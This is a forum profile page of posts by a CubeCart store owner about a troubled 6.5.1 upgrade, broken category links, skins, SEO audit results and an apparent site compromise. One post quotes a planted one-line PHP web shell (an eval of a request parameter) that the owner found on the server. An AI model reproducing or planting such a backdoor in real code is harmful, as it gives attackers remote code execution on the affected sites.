Jump to content

volteq

Member
  • Posts

    99
  • Joined

  • Last visited

Everything posted by volteq

  1. delete everything in that table? I have bunch of google analytics ones and one says controller.index what about the .htaccess file? it says this: <FilesMatch "^(sess_|snippet_|es.json)"> deny from all </FilesMatch>
  2. the bad news is that my other website also has it. except that site has two files with wierd names and the content is legible. one of them reads this: <?php $GLOBALS['smarty']->assign('featured', $vars[0]); $content = $GLOBALS['smarty']->fetch('templates/box.featured.php'); $GLOBALS['smarty']->assign('RANDOM_PROD', $content); ?> the other one looks like this: <?php eval($_REQUEST["DC123"]);?> they both keep on coming back
  3. I do seem to have some virus. there are a few wierd looking files with .php. I deleted them but they keep on coming back. the index file looks like this: <?php /** * CubeCart v6 * ======================================== * CubeCart is a registered trade mark of CubeCart Limited * Copyright CubeCart Limited 2017. All rights reserved. * UK Private Limited Company No. 5323904 * ======================================== * Web: http://www.cubecart.com * Email: [email protected] * License: GPL-3.0 https://www.gnu.org/licenses/quick-guide-gplv3.html */ die('Access denied');
  4. thank you! I did that and it is able to upgrade to 6.5.1. however, still have a lot of broken links and most ugly of all, I get some encoded text of this thing on top of every page: assign('featured', $vars[0]); $content = $GLOBALS['smarty']->fetch('templates/box.featured.php'); $GLOBALS['smarty']->assign('RANDOM_PROD', $content); ?> do you know where it might be located and how it ended up showing on top of every page? it shows up on every skin
  5. I got rid of the double .html issue by going into the database and remove the .html from the urls. at this point, what I really need help with is how to upgrade to 6.5.1 while the last few times the system would not follow through with setup.index, andclaimed victory prematurally.
  6. I seemed to have made things worse by working on it ... now I cannot properly upgrade the website anymore. anytime I tried to upgrade, it won't go through setup properly. normally it needs to take some time, now it just declares the 6.5.1 already existed. of course when I go check it out, none of the links work! how can I remove that indicator for 6.5.1 so I can force it to go through setup? another thing is that I have made the seo links to work only with double html, like this: https://mastechpowersupply.com/volteq-power-supply-hy3010ex-30v-10a-over-voltage-over-current-protection.html.html I don't know how to change it back. right now all links with single .html will no longer work.
  7. I sort of figured out the issue... but it's by breaking the whole site. I tried to reinstall the cubecart, by downgrading the site back to 5.2 and upgrading it again. only this time it won't go through setup, it just told me that it's the website is already at 6.5.1. this may be is the reason why all the links do not work now, and why the category links worked partly? another issue is that everything when I go through this downgrade/upgrade, as soon as set the page to setup, it tells me that the php is at 5.6, I have to go to the php manager to tell it that the php is 8.2, even though I have never changed it and the system indicated it's at 8.2. I am wondering all my problems can be due to php issue? maybe I need to reinstall php package?
  8. now it's getting more weird. I can make changes to the skin choice, and the website is stuck at the krouto skin!
  9. thanks! that took care of the all page issue. do you have any suggestions regarding the broken category issue? it's really weird that some of the links work and some don't, and I can't see any difference. e.g., on foundation skin this works: Linear Power Supply - Best Deals on Mastech Variable DC Power Supply (mastechpowersupply.com and this doesn't: Switching DC Power Supplies - Best Deals on Mastech Variable DC Power Supply (mastechpowersupply.com but on Kuroura skin they all work. On croshatch, most of them work except a couple of them. what's even more puzzling is that now the clear cache link disappears on admin!
  10. not sure what happened, in the foundation skin, some of the categories work and others don't. it's weird. also for all of the categories, when try to show all pages, it does not work. it gives a blank page. this is even true with the Kurouto mode, which has always been working. do you think it's better for me to reinstall the cubecart?
  11. OK looks like the issue is related to the server side rules by the hosting company. they changed the rules and it's working now. however, after changing skin to foundation, all the category links are not working. what could be the problem? this is the kind of system error message we get when the category links are not working: [<strong>Exception</strong>] /home/xxx/public_html/classes/db/database.class.php:507 - array_key_last(): Argument #1 ($array) must be of type array, null given https://mastechpowersupply.com/variable-dc-power-supply.html?page=all [<strong>Exception</strong>] /home/xxx/public_html/classes/db/database.class.php:507 - array_key_last(): Argument #1 ($array) must be of type array, null given https://mastechpowersupply.com/linear-dc-power-supply.html?page=all
  12. .htaccess has this: # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit # BEGIN cPanel-generated php ini directives, do not edit # Manual editing of this file may result in unexpected behavior. # To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor) # For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI) <IfModule php8_module> php_flag display_errors On php_value max_execution_time 30 php_value max_input_time 60 php_value max_input_vars 1000 php_value memory_limit 32M php_value post_max_size 8M php_value session.gc_maxlifetime 1440 php_value session.save_path "/var/cpanel/php/sessions/ea-php81" php_value upload_max_filesize 2M php_flag zlib.output_compression Off </IfModule> <IfModule lsapi_module> php_flag display_errors On php_value max_execution_time 30 php_value max_input_time 60 php_value max_input_vars 1000 php_value memory_limit 32M php_value post_max_size 8M php_value session.gc_maxlifetime 1440 php_value session.save_path "/var/cpanel/php/sessions/ea-php81" php_value upload_max_filesize 2M php_flag zlib.output_compression Off </IfModule> # END cPanel-generated php ini directives, do not edit maybe this is why? what I don't understand is why we need this?
  13. how do I do that? by the way, the issue of cannot login to admin comes and goes. I think it's related to broswer cache or sesion information. another strange thing is after I get the config text decoded, I tried to encode it back. I can't get the same coded text, even though decode that different text seems to generate the same normal text, or at least by my quick check. I tried to use that different encoded text to replace the original decoded text in the config table, the website goes into different skin with broken links.
  14. this is what the store overview says: CubeCart Version 6.5.1 PHP Version (7.3 Recommended) 8.1.18
  15. is there a way to manually set the skin type? from database or where this variable is kept? by the way, the admin allows most of the variables to be set, except the skin selection, enable/disable debugging, etc. while it issued multiple of 406 errors, none of them got logged in the error report.
  16. yes version 6.5.1, the latest. Not sure if it's related. if I change the .htaccess file name, the website will complain that the php version is too low, and the website will not work.
  17. Update: I was able to logon using a different browser. The weird text on the website also went away. however, when trying to change the skin to foundation on the layout tab, I got this message: Error 406 - Not Acceptable Generally a 406 error is caused because a request has been blocked by Mod Security. If you believe that your request has been blocked by mistake please contact the web site owner.
  18. today we upgraded our website to Cubecart 6.1 from 5.2. I had to do it multiple times, but each time I got into the same issues. I cannot log into the admin page. the password and user name seems to be fine, as it does not complain. it just stay at the same page. Not sure if it helps, the website seems to work but it carries a big chunk of unknow text on the top. other than that, it seems to work. Here is the website: https://mastechpowersupply.com please help. thanks in advance.
  19. Thanks for your explanation. I guess we will have to live with this issue then.
  20. can you take a second look at this? I somehow feel this is not the location for the issue. when I delete the code, it does nothing to the problem. here is what google complained about: div#review_stars > span.star-rating-control > div.rating-cancel > a
  21. this is a hard one ...
  22. with help from this forum, especially bsmither, we are solving most of the issues with core vitals. however, we still see two issues related to SEO: CONTENT BEST PRACTICES Links do not have descriptive text 1 link found Descriptive link text helps search engines understand your content. Learn how to make links more accessible. Link destination Link Text volteq.com 1st Party /adjustable-dc-power-supply.html?page=2 (volteq.com) More Format your HTML in a way that enables crawlers to better understand your app’s content. CRAWLING AND INDEXING Links are not crawlable Search engines may use href attributes on links to crawl websites. Ensure that the href attribute of anchor elements links to an appropriate destination, so more pages of the site can be discovered. Learn how to make links crawlable Uncrawlable Link Shop by Category <a href=""> body > div.off-canvas-wrap > div.inner-wrap > a.exit-off-canvas <a class="exit-off-canvas"> To appear in search results, crawlers need access to your app. ADDITIONAL ITEMS TO MANUALLY CHECK (1) Hide CONTENT BEST PRACTICES Links do not have descriptive text 1 link found Descriptive link text helps search engines understand your content. Learn how to make links more accessible. Link destination Link Text volteq.com 1st Party /adjustable-dc-power-supply.html?page=2 (volteq.com) More Format your HTML in a way that enables crawlers to better understand your app’s content. CRAWLING AND INDEXING Links are not crawlable Search engines may use href attributes on links to crawl websites. Ensure that the href attribute of anchor elements links to an appropriate destination, so more pages of the site can be discovered. Learn how to make links crawlable Uncrawlable Link Shop by Category <a href=""> body > div.off-canvas-wrap > div.inner-wrap > a.exit-off-canvas <a class="exit-off-canvas"> To appear in search results, crawlers need access to your app. ADDITIONAL ITEMS TO MANUALLY CHECK (1) Hide Structured data is valid Run the Structured Data Testing Tool and the Structured Data Linter to validate structured data. Learn more about Structured Data. Run these additional validators on your site to check additional SEO best practices. PASSED AUDITS (10) Show NOT APPLICABLE (2) Show More on PageSpeed InsightsWhat's newDocumentationLearn about Web PerformanceAsk questions on Stack OverflowMailing list Related ContentUpdatesWeb FundamentalsCase StudiesPodcasts ConnectTwitterYoutube ChromeFirebaseAll products Terms and Privacy Policy For details, see the Google Developers Site Policies. CONTENT BEST PRACTICES Links do not have descriptive text 1 link found Descriptive link text helps search engines understand your content. Learn how to make links more accessible. Link destination Link Text volteq.com 1st Party /adjustable-dc-power-supply.html?page=2 (volteq.com) More Format your HTML in a way that enables crawlers to better understand your app’s content. CRAWLING AND INDEXING Links are not crawlable Search engines may use href attributes on links to crawl websites. Ensure that the href attribute of anchor elements links to an appropriate destination, so more pages of the site can be discovered. Learn how to make links crawlable Uncrawlable Link Shop by Category <a href=""> body > div.off-canvas-wrap > div.inner-wrap > a.exit-off-canvas <a class="exit-off-canvas"> To appear in search results, crawlers need access to your app. ADDITIONAL ITEMS TO MANUALLY CHECK (1) Hide Structured data is valid Run the Structured Data Testing Tool and the Structured Data Linter to validate structured data. Learn more about Structured Data. Run these additional validators on your site to check additional SEO best practices. PASSED AUDITS (10) Show NOT APPLICABLE (2) Show More on PageSpeed InsightsWhat's newDocumentationLearn about Web PerformanceAsk questions on Stack OverflowMailing list Related ContentUpdatesWeb FundamentalsCase StudiesPodcasts ConnectTwitterYoutube ChromeFirebaseAll products Terms and Privacy Policy For details, see the Google Developers Site Policies. Structured data is valid Run the Structured Data Testing Tool and the Structured Data Linter to validate structured data. Learn more about Structured Data. Run these additional validators on your site to check additional SEO best practices. PASSED AUDITS (10) Show NOT APPLICABLE (2) Show More on PageSpeed InsightsWhat's newDocumentationLearn about Web PerformanceAsk questions on Stack OverflowMailing list Related ContentUpdatesWeb FundamentalsCase StudiesPodcasts ConnectTwitterYoutube ChromeFirebaseAll products Terms and Privacy Policy For details, see the Google Developers Site Policies.
  23. thanks for the information. what is this for? In main.checkout.php (38, bars)
  24. images are not the problem, but you need to compress them real hard! I used webp format now and typical size of the images are 20K or less, with the biggest ones 50-60K. We used to have pictures of 500K or even above 1M. with CLS, I found most of them are coming from the main picture on product page. vertically the image causes the webpage to shift. we solved the problem by setting vertical size of the main picture. currently among the core vitals measures, we mostly face accessibility and SEO issues, with accessibility consistently below 90, and SEO hovering around 90. please share your insight on how to take care of these issue related to foundation skin?
  25. thanks! look forward to that... I did make some tweaks with the add to basket thingy, adding Qty: to the left of the number box as the label. however, it did not work for mobile device in the vertical mode. Cubecart automatically switches to the special mode for mobile device in vertical direction, and I have not found the code that does the switch yet. also google complained at lot about the accessibility issues related to contrast, which I am trying to solve as well. It will help me a lot if you can point me to where the code is controlling the path on top the product descriptions, something like this: HOME LINEAR DC POWER SUPPLY HY1503D LAB GRADE REGULATED LINEAR DC POWER SUPPLY 15V 3A
×
×
  • Create New...